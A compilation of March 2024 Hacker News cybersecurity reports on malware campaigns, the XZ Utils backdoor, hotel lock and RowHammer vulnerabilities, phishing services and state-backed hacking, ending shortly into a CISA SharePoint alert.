H January(68) February(106) March(112) April(110) June(37) July(4)
Hackers Target macOS Users with Malicious Ads Spreading Stealer Malware
31.3.24
Virus
The Hacker News
Malicious ads and bogus websites
are acting as a conduit to deliver two different stealer malware, including
Atomic Stealer, targeting Apple macOS users.
The ongoing infostealer attacks targeting macOS users may have adopted different methods to compromise victims' Macs, but operate with the end goal of stealing sensitive data, Jamf Threat Labs said in a report published Friday.
One such attack chain targets users searching for Arc Browser on search engines like Google to serve bogus ads that redirect users to look-alike sites ("airci[.]net") that serve the malware.
"Interestingly, the malicious website cannot be accessed directly, as it returns an error," security researchers Jaron Bradley, Ferdous Saljooki, and Maggie Zirnhelt said. "It can only be accessed through a generated sponsored link, presumably to evade detection."
The disk image file downloaded from the counterfeit website ("ArcSetup.dmg") delivers Atomic Stealer, which is known to request users to enter their system passwords via a fake prompt and ultimately facilitate information theft.
Jamf said it also discovered a phony website called meethub[.]gg that claims to offer a free group meeting scheduling software, but actually installs another stealer malware capable of harvesting users' keychain data, stored credentials in web browsers, and information from cryptocurrency wallets.
Much like Atomic stealer, the malware – which is said to overlap with a Rust-based stealer family known as Realst – also prompts the user for their macOS login password using an AppleScript call to carry out its malicious actions.
Attacks leveraging this malware are said to have approached victims under the pretext of discussing job opportunities and interviewing them for a podcast, subsequently asking them to download an app from meethub[.]gg to join a video conference provided in the meeting invites.
"These attacks are often focused on those in the crypto industry as such efforts can lead to large payouts for attackers," the researchers said. "Those in the industry should be hyper-aware that it's often easy to find public information that they are asset holders or can easily be tied to a company that puts them in this industry."
The development comes as MacPaw's cybersecurity division Moonlock Lab disclosed that malicious DMG files ("App_v1.0.4.dmg") are being used by threat actors to deploy a stealer malware designed to extract credentials and data from various applications.
This is accomplished by means of an obfuscated AppleScript and bash payload that's retrieved from a Russian IP address, the former of which is used to launch a deceptive prompt (as mentioned above) to trick users into providing the system passwords.
"Disguised as a harmless DMG file, it tricks the user into installation via a phishing image, persuading the user to bypass macOS's Gatekeeper security feature," security researcher Mykhailo Hrebeniuk said.
The development is an indication that macOS environments are increasingly under threat from stealer attacks, with some strains even boasting of sophisticated anti-virtualization techniques by activating a self-destructing kill switch to evade detection.
In recent weeks, malvertising campaigns have also been observed pushing the FakeBat loader (aka EugenLoader) and other information stealers like Rhadamanthys via a Go-based loader through decoy sites for popular software such as Notion and PuTTY.
Urgent: Secret Backdoor Found in XZ Utils Library, Impacts Major Linux Distros
30.3.24
Virus
The Hacker News
RedHat on Friday released an
"urgent security alert" warning that two versions of a popular data compression
library called XZ Utils (previously LZMA Utils) have been backdoored with
malicious code designed to allow unauthorized remote access.
The software supply chain compromise, tracked as CVE-2024-3094, has a CVSS score of 10.0, indicating maximum severity. It impacts XZ Utils versions 5.6.0 (released February 24) and 5.6.1 (released March 9).
"Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code," the IBM subsidiary said in an advisory.
"This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library."
Specifically, the nefarious code baked into the code is designed to interfere with the sshd daemon process for SSH (Secure Shell) via the systemd software suite, and potentially enable a threat actor to break sshd authentication and gain unauthorized access to the system remotely "under the right circumstances."
Microsoft security researcher Andres Freund has been credited with discovering and reporting the issue on Friday. The heavily obfuscated malicious code is said to have been introduced over a series of four commits to the Tukaani Project on GitHub by a user named JiaT75.
"Given the activity over several weeks, the committer is either directly
involved or there was some quite severe compromise of their system," Freund
said. "Unfortunately the latter looks like the less likely explanation, given
they communicated on various lists about the 'fixes.'"
Microsoft-owned GitHub has since disabled the XZ Utils repository maintained by the Tukaani Project "due to a violation of GitHub's terms of service." There are currently no reports of active exploitation in the wild.
Evidence shows that the packages are only present in Fedora 41 and Fedora Rawhide, and do not impact Red Hat Enterprise Linux (RHEL), Debian Stable, Amazon Linux, and SUSE Linux Enterprise and Leap.
Out of an abundance of caution, Fedora Linux 40 users have been recommended to downgrade to a 5.4 build. Some of the other Linux distributions impacted by the supply chain attack are below -
Kali Linux (between March 26 and 29)
openSUSE Tumbleweed and openSUSE MicroOS
(between March 7 and 28)
Debian testing, unstable, and experimental versions
(from 5.5.1alpha-0.1 to 5.6.1-1)
The development has prompted the U.S.
Cybersecurity and Infrastructure Security Agency (CISA) to issue an alert of its
own, urging users to downgrade XZ Utils to an uncompromised version (e.g., XZ
Utils 5.4.6 Stable).
Dormakaba Locks Used in Millions of Hotel Rooms Could Be Cracked in Seconds
30.3.24
Hacking
The Hacker News
Security vulnerabilities discovered in Dormakaba's Saflok electronic RFID locks used in hotels could be weaponized by threat actors to forge keycards and stealthily slip into locked rooms.
The shortcomings have been collectively named Unsaflok by researchers Lennert Wouters, Ian Carroll, rqu, BusesCanFly, Sam Curry, sshell, and Will Caruana. They were reported to the Zurich-based company in September 2022.
"When combined, the identified weaknesses allow an attacker to unlock all rooms in a hotel using a single pair of forged keycards," they said.
Full technical specifics about the vulnerabilities have been withheld, considering the potential impact, and are expected to be made public in the future.
The issues impact more than three million hotel locks spread across 13,00 properties in 131 countries. This includes the models Saflok MT, and Quantum, RT, Saffire, and Confidant series devices, which are used in combination with the System 6000, Ambiance, and Community management software.
Dormakaba is estimated to have updated or replaced 36% of the impacted locks as of March 2024 as part of a rollout process that commenced in November 2023. Some of the vulnerable locks have been in use since 1988.
"An attacker only needs to read one keycard from the property to perform the attack against any door in the property," the researchers said. "This keycard can be from their own room, or even an expired keycard taken from the express checkout collection box."
The forged cards can be created using any MIFARE Classic card or any commercially available RFID read-write tools that are capable of writing data to these cards. Alternatively, Proxmark3, Flipper Zero, or even an NFC capable Android phone can be used in place of the cards.
Speaking to WIRED's Andy Greenberg, the researchers said the attack entails reading a certain code from that card and creating a pair of forged keycards using the aforementioned method – one to reprogram the data on the lock and another to open it by cracking Dormakaba's Key Derivation Function (KDF) encryption system.
"Two quick taps and we open the door," Wouters was quoted as saying.
Another crucial step involves reverse engineering the lock programming devices distributed by Dormakaba to hotels and the front desk software for managing keycards, thereby allowing the researchers to spoof a working master key that could be used to unlock any room.
There is currently no confirmed case of exploitation of these issues in the wild, although the researchers don't rule out the possibility that the vulnerabilities have been discovered or used by others.
"It may be possible to detect certain attacks by auditing the lock's entry/exit logs," they added. "Hotel staff can audit this via the HH6 device and look for suspicious entry/exit records. Due to the vulnerability, entry/exit records could be attributed to the wrong keycard or staff member."
The disclosure comes on the back of the discovery of three critical security vulnerabilities in commonly used Electronic Logging Devices (ELDs) in the trucking industry that could be weaponized to enable unauthorized control over vehicle systems and manipulate data and vehicle operations arbitrarily.
Even more concerningly, one of the flaws could pave the way for a self-propagating truck-to-truck worm, potentially leading to widespread disruptions in commercial fleets and leading to severe safety consequences.
TheMoon Botnet Resurfaces, Exploiting EoL Devices to Power Criminal Proxy
30.3.24
BotNet
The Hacker News
A botnet previously considered to
be rendered inert has been observed enslaving end-of-life (EoL) small home/small
office (SOHO) routers and IoT devices to fuel a criminal proxy service called
Faceless.
"TheMoon, which emerged in 2014, has been operating quietly while growing to over 40,000 bots from 88 countries in January and February of 2024," the Black Lotus Labs team at Lumen Technologies said.
Faceless, detailed by security journalist Brian Krebs in April 2023, is a malicious residential proxy service that's offered its anonymity services to other threat actors for a negligible fee that costs less than a dollar per day.
In doing so, it allows the customers to route their malicious traffic through tens of thousands of compromised systems advertised on the service, effectively concealing their true origins.
The Faceless-backed infrastructure has been assessed to be used by operators of malware such as SolarMarker and IcedID to connect to their command-and-control (C2) servers to obfuscate their IP addresses.
That being said, a majority of the bots are used for password spraying and/or data exfiltration, primarily targeting the financial sector, with more than 80% of the infected hosts located in the U.S.
Lumen said it first observed the malicious activity in late 2023, the goal being to breach EoL SOHO routers and IoT devices and deploy an updated version of TheMoon, and ultimately enroll the botnet into Faceless.
The attacks entail dropping a loader that's responsible for fetching an ELF
executable from a C2 server. This includes a worm module that spreads itself to
other vulnerable servers and another file called ".sox" that's used to proxy
traffic from the bot to the internet on behalf of a user.
In addition, the malware configures iptables rules to drop incoming TCP traffic on ports 8080 and 80 and allow traffic from three different IP ranges. It also attempts to contact an NTP server from a list of legitimate NTP servers in a likely effort to determine if the infected device has internet connectivity and it is not being run in a sandbox.
The targeting of EoL appliances to fabricate the botnet is no coincidence, as they are no longer supported by the manufacturer and become susceptible to security vulnerabilities over time. It's also possible that the devices are infiltrated by means of brute-force attacks.
Additional analysis of the proxy network has revealed that more than 30% of the infections lasted for over 50 days, while about 15% of the devices were part of the network for 48 hours or less.
"Faceless has become a formidable proxy service that rose from the ashes of the 'iSocks' anonymity service and has become an integral tool for cyber criminals in obfuscating their activity," the company said. "TheMoon is the primary, if not the only, supplier of bots to the Faceless proxy service."
New Linux Bug Could Lead to User Password Leaks and Clipboard Hijacking
30.3.24
Hacking
The Hacker News
Details have emerged about a
vulnerability impacting the "wall" command of the util-linux package that could
be potentially exploited by a bad actor to leak a user's password or alter the
clipboard on certain Linux distributions.
The bug, tracked as CVE-2024-28085, has been codenamed WallEscape by security researcher Skyler Ferrante. It has been described as a case of improper neutralization of escape sequences.
"The util-linux wall command does not filter escape sequences from command line arguments," Ferrante said. "This allows unprivileged users to put arbitrary text on other users' terminals, if mesg is set to "y" and wall is setgid."
The vulnerability was introduced as part of a commit made in August 2013.
The "wall" command is used to write a message to the terminals of all users that are currently logged in to a server, essentially allowing users with elevated permissions to broadcast key information to all local users (e.g., a system shutdown).
"wall displays a message, or the contents of a file, or otherwise its standard input, on the terminals of all currently logged in users," the man page for the Linux command reads. "Only the superuser can write on the terminals of users who have chosen to deny messages or are using a program which automatically denies messages."
CVE-2024-28085 essentially exploits improperly filtered escape sequences provided via command line arguments to trick users into creating a fake sudo (aka superuser do) prompt on other users' terminals and trick them into entering their passwords.
However, for this to work, the mesg utility – which controls the ability to display messages from other users – has to be set to "y" (i.e., enabled) and the wall command has to have setgid permissions.
CVE-2024-28085 impacts Ubuntu 22.04 and Debian Bookworm as these two criteria are met. On the other hand, CentOS is not vulnerable since the wall command does not have setgid.
"On Ubuntu 22.04, we have enough control to leak a user's password by default," Ferrante said. "The only indication of attack to the user will be an incorrect password prompt when they correctly type their password, along with their password being in their command history."
Similarly, on systems that allow wall messages to be sent, an attacker could potentially alter a user's clipboard through escape sequences on select terminals like Windows Terminal. It does not work on GNOME Terminal.
Users are advised to update to util-linux version 2.40 to mitigate against the flaw.
"[CVE-2024-28085] allows unprivileged users to put arbitrary text on other users terminals, if mesg is set to y and *wall is setgid*," according to the release notes. "Not all distros are affected (e.g., CentOS, RHEL, Fedora are not; Ubuntu and Debian wall is both setgid and mesg is set to y by default)."
The disclosure comes as security researcher notselwyn detailed a use-after-free vulnerability in the netfilter subsystem in the Linux kernel that could be exploited to achieve local privilege escalation.
Assigned the CVE identifier CVE-2024-1086 (CVSS score: 7.8), the underlying issue stems from input sanitization failure of netfilter verdicts, allowing a local attacker to cause a denial-of-service (DoS) condition or possibly execute arbitrary code. It has been addressed in a commit pushed on January 24, 2024.
PyPI Halts Sign-Ups Amid Surge of Malicious Package Uploads Targeting Developers
29.3.24
Hacking
The Hacker News
The maintainers of the Python
Package Index (PyPI) repository briefly suspended new user sign-ups following an
influx of malicious projects uploaded as part of a typosquatting campaign.
It said "new project creation and new user registration" was temporarily halted to mitigate what it said was a "malware upload campaign." The incident was resolved 10 hours later, on March 28, 2024, at 12:56 p.m. UTC.
Software supply chain security firm Checkmarx said the unidentified threat actors behind flooding the repository targeted developers with typosquatted versions of popular packages.
"This is a multi-stage attack and the malicious payload aimed to steal crypto wallets, sensitive data from browsers (cookies, extensions data, etc.), and various credentials," researchers Yehuda Gelb, Jossef Harush Kadouri, and Tzachi Zornstain said. "In addition, the malicious payload employed a persistence mechanism to survive reboots."
The findings were also corroborated independently by Mend.io, which noted that it detected more than 100 malicious packages targeting machine learning (ML) libraries such as Pytorch, Matplotlib, and Selenium.
The development comes as open-source repositories are increasingly becoming an attack vector for threat actors to infiltrate enterprise environments.
Typosquatting is a well-documented attack technique in which adversaries upload packages with names closely resembling their legitimate counterparts (e.g., Matplotlib vs. Matplotlig or tensorflow vs. tensourflow) in order to trick unsuspecting users into downloading them.
These deceptive variants – totalling over 500 packages, per Check Point – have been found to be uploaded from a unique account starting March 26, 2024, suggesting that the whole process was automated.
"The decentralized nature of the uploads, with each package attributed to a different user, complicates efforts to cross-identify these malicious entries," the Israeli cybersecurity company said.
Malicious Package
Cybersecurity firm Phylum, which has also been tracking the
same campaign, said the attackers published -
67 variations of requirements
38 variations of Matplotlib
36 variations of
requests
35 variations of colorama
29 variations of tensorflow
28
variations of selenium
26 variations of BeautifulSoup
26 variations of
PyTorch
20 variations of pillow
15 variations of asyncio
The packages,
for their part, check if the installer's operating system was Windows, and if
so, proceed to download and execute an obfuscated payload retrieved from an
actor-controlled domain ("funcaptcha[.]ru").
The malware functions as a stealer, exfiltrating files, Discord tokens, as well as data from web browsers and cryptocurrency wallets to the same server. It further attempts to download a Python script ("hvnc.py") to the Windows Startup folder for persistence.
The development once again illustrates the escalating risk posed by software supply chain attacks, making it crucial that developers scrutinize every third-party component to ensure that it safeguards against potential threats.
This is not the first time PyPI has resorted to such a measure. In May 2023, it temporarily disabled user sign-ups after finding that the "volume of malicious users and malicious projects being created on the index in the past week has outpaced our ability to respond to it in a timely fashion."
PyPI suspended new user registrations a second-time last year on December 27 for similar reasons. It was subsequently lifted on January 2, 2024.
Linux Version of DinodasRAT Spotted in Cyber Attacks Across Several Countries
29.3.24
Virus
The Hacker News
A Linux version of a multi-platform
backdoor called DinodasRAT has been detected in the wild targeting China,
Taiwan, Turkey, and Uzbekistan, new findings from Kaspersky reveal.
DinodasRAT, also known as XDealer, is a C++-based malware that offers the ability to harvest a wide range of sensitive data from compromised hosts.
In October 2023, Slovak cybersecurity firm ESET revealed that a governmental entity in Guyana has been targeted as part of a cyber espionage campaign dubbed Operation Jacana to deploy the Windows version of the implant.
Then last week, Trend Micro detailed a threat activity cluster it tracks as Earth Krahang and which has shifted to using DinodasRAT since 2023 in its attacks aimed at several government entities worldwide.
The use of DinodasRAT has been attributed to various China-nexus threat actors, including LuoYu, once again reflecting the tool sharing prevalent among hacking crews identified as acting on behalf of the country.
Kaspersky said it discovered a Linux version of the malware (V10) in early
October 2023. Evidence gathered so far shows that the first known variant (V7)
dates back to 2021.
It's mainly designed to target Red Hat-based distributions and Ubuntu Linux. Upon execution, it establishes persistence on the host by using SystemV or SystemD startup scripts and periodically contacts a remote server over TCP or UDP to fetch the commands to be run.
DinodasRAT is equipped to perform file operations, change command-and-control (C2) addresses, enumerate and terminate running processes, execute shell commands, download a new version of the backdoor, and even uninstall itself.
It also takes steps to evade detection by debugging and monitoring tools, and like its Windows counterpart, utilizes the Tiny Encryption Algorithm (TEA) to encrypt C2 communications.
"DinodasRAT's primary use case is to gain and maintain access via Linux servers rather than reconnaissance," Kaspersky said. "The backdoor is fully functional, granting the operator complete control over the infected machine, enabling data exfiltration and espionage."
Finland Blames Chinese Hacking Group APT31 for Parliament Cyber Attack
29.3.24
APT
The Hacker News
The Police of Finland (aka Poliisi)
has formally accused a Chinese nation-state actor tracked as APT31 for
orchestrating a cyber attack targeting the country's Parliament in 2020.
The intrusion, per the authorities, is said to have occurred between fall 2020 and early 2021. The agency described the ongoing criminal probe as both demanding and time-consuming, involving extensive analysis of a "complex criminal infrastructure."
The breach was first disclosed in December 2020, with the Finnish Security and Intelligence Service (Supo) describing it as a state-backed cyber espionage operation designed to penetrate the Parliament's information systems.
"The police have previously informed that they are investigating the hacking group APT31's connections with the incident," Poliisi said. "These connections have now been confirmed by the investigation, and the police have also identified one suspect."
APT31, also called Altaire, Bronze Vinewood, Judgement Panda, and Violet Typhoon (formerly Zirconium), is a Chinese state-backed group that has been active since at least 2010.
Earlier this week, the U.K. and the U.S. blamed the adversarial collective for engaging in a widespread cyber espionage campaign targeting businesses, government officials, dissidents, and politicians.
Seven operatives associated with the group have been charged in the U.S. for their involvement in the hacking spree. Two of them – Ni Gaobin and Zhao Guangzong – have been sanctioned by the two nations, alongside a company named Wuhan XRZ, which allegedly served as a cover for orchestrating cyber attacks against critical infrastructure.
"Guangzong is a Chinese national who has conducted numerous malicious cyber operations against U.S. victims as a contractor for Wuhan XRZ," the U.S. Treasury said. "Ni Gaobin assisted Zhao Guangzong in many of his most high profile malicious cyber activities while Zhao Guangzong was a contractor at Wuhan XRZ."
In July 2021, the U.S. and its allies implicated APT31 in a widespread campaign exploiting zero-day security flaws in Microsoft Exchange servers with the goal of likely "acquiring personally identifiable information and intellectual property."
China, however, has hit back against the accusations that it's behind the hacking campaign targeting the West. It has accused the Five Eyes (FVEY) alliance of spreading "disinformation about the threats posed by the so-called 'Chinese hackers.'"
"We urge the U.S. and the U.K. to stop politicizing cybersecurity issues, stop smearing China and imposing unilateral sanctions on China, and stop cyberattacks against China," China's Foreign Ministry Spokesperson Lin Jian said. "China will take necessary measures to firmly safeguard its lawful rights and interests."
New ZenHammer Attack Bypasses RowHammer Defenses on AMD CPUs
29.3.24
Attack
The Hacker News
Cybersecurity researchers from ETH
Zurich have developed a new variant of the RowHammer DRAM (dynamic random-access
memory) attack that, for the first time, successfully works against AMD Zen 2
and Zen 3 systems despite mitigations such as Target Row Refresh (TRR).
"This result proves that AMD systems are equally vulnerable to Rowhammer as Intel systems, which greatly increases the attack surface, considering today's AMD market share of around 36% on x86 desktop CPUs," the researchers said.
The technique has been codenamed ZenHammer, which can also trigger RowHammer bit flips on DDR5 devices for the first time.
RowHammer, first publicly disclosed in 2014, is a well-known attack that exploits DRAM's memory cell architecture to alter data by repeatedly accessing a specific row (aka hammering) to cause the electrical charge of a cell to leak to adjacent cells.
This can induce random bit flips in neighboring memory rows (from 0 to 1, or vice versa), which can alter the memory contents and potentially facilitate privilege escalation, compromising confidentiality, integrity, and availability of a system.
The attacks take advantage of the physical proximity of these cells within the memory array, a problem that's likely to worsen as the DRAM technology scaling continues and the storage density increases.
"As DRAM continues to scale, RowHammer bit flips can occur at smaller activation counts and thus a benign workload's DRAM row activation rates can approach or even exceed the RowHammer threshold," ETH Zurich researchers noted in a paper published in November 2022.
"Thus, a system may experience bit flips or frequently trigger RowHammer defense mechanisms even without a malicious party performing a RowHammer attack in the system, leading to data corruption or significant performance degradation."
One of the crucial mitigations implemented by DRAM manufacturers against RowHammer is TRR, which is an umbrella term used for mechanisms that refresh target rows that are determined to be accessed frequently.
In doing so, the idea is to generate more memory refresh operations so that victim rows will either be refreshed before bits are flipped or be corrected after bits are flipped due to RowHammer attacks.
ZenHammer, like TRRespass and SMASH, bypasses TRR guardrails by reverse engineering the secret DRAM address functions in AMD systems and adopting improved refresh synchronization and scheduling of flushing and fencing instructions to trigger bit flips on seven out of 10 sample Zen 2 devices and six out of 10 Zen 3 devices.
The study also arrived at an optimal hammering instruction sequence to improve row activation rates in order to facilitate more effective hammering.
"Our results showed that regular loads (MOV) with CLFLUSHOPT for flushing aggressors from the cache, issued immediately after accessing an aggressor ('scatter' style), is optimal," the researchers said.
ZenHammer has the distinction of being the very first method that can trigger bit flips on systems equipped with DDR5 chips on AMD's Zen 4 microarchitectural platform. That said, it only works on one of the 10 tested devices (Ryzen 7 7700X).
It's worth noting that DDR5 DRAM modules were previously considered immune to RowHammer attacks owing to them replacing TRR with a new kind of protection called refresh management.
"The changes in DDR5 such as improved RowHammer mitigations, on-die error correction code (ECC), and a higher refresh rate (32 ms) make it harder to trigger bit flip," the researchers said.
"Given the lack of bit flips on nine of 10 DDR5 devices, more work is needed to better understand the potentially new RowHammer mitigations and their security guarantees."
AMD, in a security bulletin, said it's assessing RowHammer bit flips on DDR5 devices, and that it will provide an update following its completion.
"AMD microprocessor products include memory controllers designed to meet industry-standard DDR specifications," it added. "Susceptibility to RowHammer attacks varies based on the DRAM device, vendor, technology, and system settings."
Darcula Phishing Network Leveraging RCS and iMessage to Evade Detection
29.3.24
Phishing
The Hacker News
A sophisticated
phishing-as-a-service (PhaaS) platform called Darcula has set its sights on
organizations in over 100 countries by leveraging a massive network of more than
20,000 counterfeit domains to help cyber criminals launch attacks at scale.
"Using iMessage and RCS rather than SMS to send text messages has the side effect of bypassing SMS firewalls, which is being used to great effect to target USPS along with postal services and other established organizations in 100+ countries," Netcraft said.
Darcula has been employed in several high-profile phishing attacks over the last year, wherein the smishing messages are sent to both Android and iOS users in the U.K., in addition to those that leverage package delivery lures by impersonating legitimate services like USPS.
A Chinese-language PhaaS, Darcula is advertised on Telegram and offers support for about 200 templates impersonating legitimate brands that customers can avail for a monthly fee to set up phishing sites and carry out their malicious activities.
A majority of the templates are designed to mimic postal services, but they also include public and private utilities, financial institutions, government bodies (e.g., tax departments), airlines, and telecommunication organizations.
The phishing sites are hosted on purpose-registered domains that spoof the respective brand names to add a veneer of legitimacy. These domains are backed by Cloudflare, Tencent, Quadranet, and Multacom.
In all, more than 20,000 Darcula-related domains across 11,000 IP addresses have been detected, with an average of 120 new domains identified per day since the start of 2024. Some aspects of the PhaaS service were revealed in July 2023 by Israeli security researcher Oshri Kalfon.
One of the interesting additions to Darcula is its capability to update phishing sites with new features and anti-detection measures without having to remove and reinstall the phishing kit.
"On the front page, Darcula sites display a fake domain for sale/holding page, likely as a form of cloaking to disrupt takedown efforts," the U.K.-based company said. "In previous iterations, Darcula's anti-monitoring mechanism would redirect visitors that are believed to be bots (rather than potential victims) to Google searches for various cat breeds."
Darcula's smishing tactics also warrant special attention as they primarily leverage Apple iMessage and the RCS (Rich Communication Services) protocol used in Google Messages instead of SMS, thereby evading some filters put in place by network operators to prevent scammy messages from being delivered to prospective victims.
"While end-to-end encryption in RCS and iMessage delivers valuable privacy for end users, it also allows criminals to evade filtering required by this legislation by making the content of messages impossible for network operators to examine, leaving Google and Apple's on-device spam detection and third-party spam filter apps as the primary line of defense preventing these messages from reaching victims," Netcraft added.
"Additionally, they do not incur any per-message charges, which are typical for SMS, reducing the cost of delivery."
The departure from traditional SMS-based phishing aside, another noteworthy aspect of Darcula's smishing messages is their sneaky attempt to get around a safety measure in iMessage that prevents links from being clickable unless the message is from a known sender.
This entails instructing the victim to reply with a "Y" or "1" message and then
reopen the conversation to follow the link. One such message posted on
r/phishing subreddit shows that users are persuaded to click on the URL by
claiming that they have provided an incomplete delivery address for the USPS
package.
These iMessages are sent from email addresses such as pl4396@gongmiaq.com and mb6367587@gmail.com, indicating that the threat actors behind the operation are creating bogus email accounts and registering them with Apple to send the messages.
Google, for its part, recently said it's blocking the ability to send messages using RCS on rooted Android devices to cut down on spam and abuse.
The end goal of these attacks is to trick the recipients into visiting bogus sites and handing over their personal and financial information to the fraudsters. There is evidence to suggest that Darcula is geared towards Chinese-speaking e-crime groups.
Phishing kits can have serious consequences as it permits less-skilled criminals to automate many of the steps needed to conduct an attack, thus lowering barriers to entry.
The development comes amid a new wave of phishing attacks that take advantage of Apple's password reset feature, bombarding users with what's called a prompt bombing (aka MFA fatigue) attack in hopes of hijacking their accounts.
Assuming a user manages to deny all the requests, "the scammers will then call the victim while spoofing Apple support in the caller ID, saying the user's account is under attack and that Apple support needs to 'verify' a one-time code," security journalist Brian Krebs said.
The voice phishers have been found to use information about victims obtained from people search websites to increase the likelihood of success, and ultimately "trigger an Apple ID reset code to be sent to the user's device," which, if supplied, allows the attackers to reset the password on the account and lock the user out.
It's being suspected that the perpetrators are abusing a shortcoming in the password reset page at iforgot.apple[.]com to send dozens of requests for a password change in a manner that bypasses rate limiting protections.
The findings also follow research from F.A.C.C.T. that SIM swappers are transferring a target user's phone number to their own device with an embedded SIM (eSIM) in order to gain unauthorized access to the victim's online services. The practice is said to have been employed in the wild for at least a year.
This is accomplished by initiating an application on the operator's website or application to transfer the number from a physical SIM card to an eSIM by masquerading as the victim, causing the legitimate owner to lose access to the number as soon as the eSIM QR Code is generated and activated.
"Having gained access to the victim's mobile phone number, cybercriminals can obtain access codes and two-factor authentication to various services, including banks and messengers, opening up a mass of opportunities for criminals to implement fraudulent schemes," security researcher Dmitry Dudkov said.
Telegram Offers Premium Subscription in Exchange for Using Your Number to Send
OTPs
29.3.24
Social
The Hacker News
In June 2017, a study of more than
3,000 Massachusetts Institute of Technology (MIT) students published by the
National Bureau for Economic Research (NBER) found that 98% of them were willing
to give away their friends' email addresses in exchange for free pizza.
"Whereas people say they care about privacy, they are willing to relinquish private data quite easily when incentivized to do so," the research said, pointing out a what's called the privacy paradox.
Now, nearly seven years later, Telegram has introduced a new feature that gives some users a free premium membership in exchange for allowing the popular messaging app to use their phone numbers as a relay for sending one-time passwords (OTPs) to other users who are attempting to sign in to the platform.
The feature, called Peer-to-Peer Login (P2PL), is currently being tested in selected countries for Android users of Telegram. It was first spotted by tginfo in February 2024 (via @AssembleDebug).
According to Telegram's Terms of Service, the phone number will be used to send no more than 150 OTP SMS messages – including international SMS – per month, incurring charges from the user's mobile carrier or service provider.
That said, the popular messaging app notes that it "cannot prevent the OTP recipient from seeing your phone number upon receiving your SMS" and that it "will not be liable for any inconvenience, harassment or harm resulting from unwanted, unauthorized or illegal actions undertaken by users who became aware of your phone number through P2PL."
Even worse, the mechanism – which largely relies on a honor system – doesn't prohibit users from contacting strangers to whose number the OTP authentication SMS was sent, and vice versa, potentially leading to an increase in spam calls and texts.
Telegram said it reserves the right to unilaterally terminate an account from the P2PL program if participants are found sharing personal information about recipients. It also warns users not to contact any OTP recipients or reply to them even if they message them.
As of March 2024, Telegram has more than 900 million monthly active users. It launched the Premium subscription program in June 2022, allowing users to unlock additional features like 4 GB file uploads, faster downloads, and exclusive stickers and reactions.
With online services still relying on phone numbers to authenticate users, it's worth keeping in mind the privacy and security risks that could arise from partaking in the experiment.
Meta in Legal Crosshairs for Intercepting Snapchat Traffic#
The development
comes as newly unsealed court documents in the U.S. alleged that Meta launched a
secret project called Ghostbusters to intercept and decrypt the network traffic
from people using Snapchat, YouTube, and Amazon to help it understand user
behavior and better compete with its rivals.
This was accomplished by leveraging custom apps from a VPN service called Onavo, which Facebook acquired in 2013 and shut down in 2019 after it came under scrutiny for using its products to track users' web activity related to its competitors and secretly paying teens to capture their internet browsing patterns.
The data-interception scheme has been described as a "man-in-the-middle" approach, in which Facebook essentially paid people between ages 13 and 35 up to $20 per month plus referral fees for installing a market research app and giving it elevated access to inspect network traffic and analyze their internet usage.
The tactic relied on creating "fake digital certificates to impersonate trusted Snapchat, YouTube, and Amazon analytics servers to redirect and decrypt secure traffic from those apps for Facebook's strategic analysis."
The apps were distributed through beta testing services, such as Applause, BetaBound, and uTest, to conceal Facebook's involvement. The program, which later came to be known as In-App Action Panel (IAAP), ran from 2016 to 2018.
Meta, in its response, said there is no crime or fraud, and that "Snapchat's own witness on advertising confirmed that Snap cannot 'identify a single ad sale that [it] lost from Meta's use of user research products,' does not know whether other competitors collected similar information, and does not know whether any of Meta's research provided Meta with a competitive advantage."
Hackers Hit Indian Defense, Energy Sectors with Malware Posing as Air Force
Invite
28.3.24
BigBrothers
The Hacker News
Indian government entities and
energy companies have been targeted by unknown threat actors with an aim to
deliver a modified version of an open-source information stealer malware called
HackBrowserData and exfiltrate sensitive information in some cases by using
Slack as command-and-control (C2).
"The information stealer was delivered via a phishing email, masquerading as an invitation letter from the Indian Air Force," EclecticIQ researcher Arda Büyükkaya said in a report published today.
"The attacker utilized Slack channels as exfiltration points to upload confidential internal documents, private email messages, and cached web browser data after the malware's execution."
The campaign, observed by the Dutch cybersecurity firm beginning March 7, 2024, has been codenamed Operation FlightNight in reference to the Slack channels operated by the adversary.
Targets of the malicious activity span multiple government entities in India, counting those related to electronic communications, IT governance, and national defense.
The threat actor is said to have successfully compromised private energy
companies, harvesting financial documents, personal details of employees,
details about drilling activities in oil and gas. In all, about 8.81 GB of data
has been exfiltrated over the course of the campaign.
The attack chain starts with a phishing message containing an ISO file ("invite.iso"), which, in turn, contains a Windows shortcut (LNK) that triggers the execution of a hidden binary ("scholar.exe") present within the mounted optical disk image.
Simultaneously, a lure PDF file that purports to be an invitation letter from the Indian Air Force is displayed to the victim while the malware clandestinely harvests documents and cached web browser data and transmits them to an actor-controlled Slack channel named FlightNight.
The malware is an altered version of HackBrowserData that goes beyond its browser data theft features to incorporate capabilities to siphon documents (Microsoft Office, PDFs, and SQL database files), communicate over Slack, and better evade detection using obfuscation techniques.
It's suspected that the threat actor stole the decoy PDF during a previous intrusion, with behavioral similarities traced back to a phishing campaign targeting the Indian Air Force with a Go-based stealer called GoStealer.
Details of the activity were disclosed by an Indian security researcher who goes by the alias xelemental (@ElementalX2) in mid-January 2024.
The GoStealer infection sequence is virtually identical to that FlightNight, employing procurement-themed lures ("SU-30 Aircraft Procurement.iso") to display a decoy file while the stealer payload is deployed to exfiltrate information of interest over Slack.
By adapting freely available offensive tools and repurposing legitimate
infrastructure such as Slack that's prevalent in enterprise environments, it
allows threat actors to reduce time and development costs, as well as easily fly
under the radar.
Image source: ElementalX2
The efficiency benefits also mean that it's that
much easier to launch a targeted attack, even allowing less-skilled and aspiring
cybercriminals to spring into action and inflict significant damage to
organizations.
"Operation FlightNight and the GoStealer campaign highlight a simple yet effective approach by threat actors to use open-source tools for cyber espionage," Büyükkaya said.
"This underscores the evolving landscape of cyber threats, wherein actors abuse widely used open-source offensive tools and platforms to achieve their objectives with minimal risk of detection and investment."
CISA Warns: Hackers Actively Attacking Microsoft SharePoint Vulnerability
28.3.24
Vulnerebility
The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a security flaw impacting the Microsoft Sharepoint Server to its Known Exploited Vulnerabilities (KEV) catalog based on evidence of active exploitation in the wild.
The vulnerability, tracked as CVE-2023-24955 (CVSS score: 7.2), is a critical remote code execution flaw that allows an authenticated attacker with Site Owner privileges to execute arbitrary code.
